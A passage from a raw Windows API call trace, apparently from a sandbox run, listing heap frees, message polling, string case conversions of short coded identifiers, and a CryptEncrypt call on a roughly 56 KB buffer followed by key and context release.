lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.204] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.204] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.204] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.204] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.205] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.205] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.205] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.205] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.205] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.205] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.206] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.206] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.206] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0161.206] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.206] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0161.206] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.206] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.206] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.206] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.206] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.207] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.207] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.207] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.207] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xdb53, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xdb58) returned 1 [0161.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.207] CharLowerBuffW (in: lpsz="byte[56152]", cchLength=0xb | out: lpsz="byte[56152]") returned 0xb [0161.208] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.208] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.208] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.208] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.208] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.208] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34bfdb0*, pdwDataLen=0x8bef68*=0xdb53, dwBufLen=0xdb58 | out: pbData=0x34bfdb0*, pdwDataLen=0x8bef68*=0xdb58) returned 1 [0161.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.210] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0161.210] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.210] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0161.210] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.210] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.210] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0161.210] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.210] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0161.210] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.210] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.210] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.211] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.211] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.211] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.211] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.211] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.211] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.211] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.211] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.211] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.215] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.218] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.218] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.218] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0161.218] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.218] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0161.218] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.219] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.219] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.219] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.219] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.219] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.219] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.219] CryptDestroyKey (hKey=0xaa55e0) returned 1 [0161.219] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.219] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.219] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0161.219] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.219] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0161.219] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.219] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.219] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0161.220] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.220] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0161.220] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.220] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.220] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.220] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.220] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.220] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0161.220] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.220] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0161.220] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0161.220] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.220] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.220] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.220] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.221] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.221] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0161.221] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.221] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0161.222] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.222] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.222] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0161.222] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.222] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0161.222] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.222] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.222] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.222] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.222] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.222] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.222] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.222] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.222] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.222] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.222] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.222] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.223] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.223] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.223] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.223] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0161.223] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.223] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0161.223] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.223] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.223] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0161.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0161.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0161.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.223] RtlAllocateHeap 